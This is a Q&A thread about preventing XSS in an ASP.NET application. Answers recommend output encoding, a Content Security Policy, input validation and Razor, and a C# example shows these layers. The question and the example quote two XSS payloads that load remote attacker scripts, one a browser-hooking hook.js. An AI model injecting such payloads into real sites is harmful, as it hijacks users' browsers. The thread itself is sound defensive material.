
In my web application, while doing penetration testing, two XSS vulnerabilities were identified in some text inputs.

That field was tested using the following cheat sheets:

<script src="http://192.168.1.122:3000/hook.js"></script>

<svg/onload=setInterval(function(){with(document)body.
appendChild(createElement("script")).src="//HOST:PORT"},0)>

How can I avoid this? Is there any .NET library or third-party library to prevent this? Please help me.

Sachith
    Sanitize your inputs. Maybe even your outputs if you're feeling especially paranoid. – user Dec 16 '19 at 16:26
  • @user can you please tell me how I can do it? Please give me sample code or a tutorial to do it using .NET. – Sachith Dec 16 '19 at 16:27
  • It's not hard to google "prevent xss asp", or even to search this site for existing answers, but here is a link anyway: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet – wireghoul Dec 16 '19 at 16:53
  • @Sachith [Here](https://stackoverflow.com/questions/188870/how-to-use-c-sharp-to-sanitize-input-on-an-html-page). – user Dec 16 '19 at 17:37


There are a few things to do:

  • HTML-encode any HTML OUTPUT. REF: https://docs.microsoft.com/en-us/dotnet/api/system.web.httputility.htmlencode?view=netframework-4.8
  • Implement a proper CSP. This will prevent third-party remote scripts from loading, like in the first payload. REF: https://content-security-policy.com/ This won't prevent XSS, but it will limit the script length to that of the field, making payload options limited.
  • If you have the time, implement INPUT validation, only allowing expected data like letters and numbers. If you have proper OUTPUT encoding this isn't even necessary, but it is still advised. The main issue with INPUT validation is that it can be bypassed much more easily than output encoding, and more mistakes are usually made here.

Look into Razor MVC syntax (https://en.wikipedia.org/wiki/ASP.NET_Razor) for HTML and JavaScript encoding. In addition to that, I'd suggest setting the x-xss-protection HTTP header properly, and for good measure it's a decent idea to have a Content Security Policy. You want to be validating your inputs and escaping your outputs. Razor MVC is a good option for this in ASP.NET.

I believe ASP.NET by default will prevent typical source-based HTML injections, so what you really want to be looking out for are DOM-based flaws (for example, URL redirection to a javascript: URI scheme) and injections in the context of inline JavaScript (e.g. their payload landing between some script tags, so they can inject pure JS code without any need for tags and/or event handlers).

Also, props to you for using my buddy Brute's browser hooking payload/syntax ;D rather than using some beef hooks. Brute is great at XSS stuff :) he's a chill friend of mine. I'm assuming you know him since that's his browser hooking payload that you posted.

There was a (kinda recent) request validation bypass method for ASP.NET, although I'd be surprised if it wasn't patched by now, because it was pretty high-profile at the time it got released. Check this out, though: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding/ If it isn't patched, then you want to be using Razor MVC to ensure that you're properly sanitizing malicious inputs of this nature.

But yeah, the other answer summarized things pretty well. Here's what you want to do:

  • Validate inputs / escape outputs (I'd suggest using Razor for this)
  • Implement a Content Security Policy
  • Ensure you don't mess anything up regarding ViewState MAC auth (as this could lead to XSS in ASP.NET)
  • Add the x-xss-protection header with the correct mode
  • Implement CORS rules

With those measures in place, you should be good... as long as you take into consideration all forms of DOM-Based attacks (as DOM-Based XSS can get around some of these countermeasures).

MLT
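As an added example (not code from either answer), here is how the three layers both answers describe fit together in an ASP.NET Core minimal-hosting app: HTML-encode at output time, send a Content-Security-Policy header, and allowlist-validate the input. The route names, the allowlist rule and the exact CSP directives are my assumptions; Razor views do the encoding step automatically, it is spelled out here so the effect on the question's first payload is visible.

```csharp
using System.Text.Encodings.Web;
using System.Text.RegularExpressions;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Http;

var builder = WebApplication.CreateBuilder(args);
var app = builder.Build();

// Layer 2 (both answers): a Content-Security-Policy response header.
// script-src 'self' means a CSP-enforcing browser refuses both the remote hook.js
// of the first payload and the inline svg/onload handler of the second, even if
// some markup slips past the other layers. (Assumed directive set for this example.)
app.Use(async (ctx, next) =>
{
    ctx.Response.Headers["Content-Security-Policy"] =
        "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'none'";
    await next();
});

// Layer 3 (first answer): allowlist INPUT validation for a free-text field.
// Hypothetical rule: letters, digits, spaces and a few punctuation marks, 1-64 characters.
// Both posted payloads contain '<', '>' and '/' and are rejected before they are stored.
static bool IsValidComment(string? s) =>
    s is not null && Regex.IsMatch(s, @"^[\p{L}\p{N} .,'!?-]{1,64}$");

// Layer 1 (both answers): encode at OUTPUT time for the context the value lands in
// (here: HTML body text). This is the step Razor's @expression performs for you.
static string RenderComment(string untrusted) =>
    $"<!doctype html><html><body><p>You entered: {HtmlEncoder.Default.Encode(untrusted)}</p></body></html>";

// Hypothetical endpoint that stores nothing and simply echoes the validated field back.
app.MapPost("/comment", async (HttpContext ctx) =>
{
    var form = await ctx.Request.ReadFormAsync();
    string? text = form["text"];
    if (!IsValidComment(text))
        return Results.BadRequest("comment may only contain letters, digits, spaces and . , ' ! ? -");
    return Results.Content(RenderComment(text!), "text/html");
});

// Constructed stored value: the question's first payload as it might already sit in a database.
// After encoding, '<' and '>' become character references, so the browser shows the
// tag as literal text instead of fetching and executing hook.js.
app.MapGet("/demo", () =>
    Results.Content(RenderComment("<script src=\"http://192.168.1.122:3000/hook.js\"></script>"), "text/html"));

app.Run();
```

Output encoding is the layer that actually closes the hole; the CSP header limits what a missed encoding can do, and the allowlist catches malformed data early but, as the first answer notes, is the easiest of the three to get wrong.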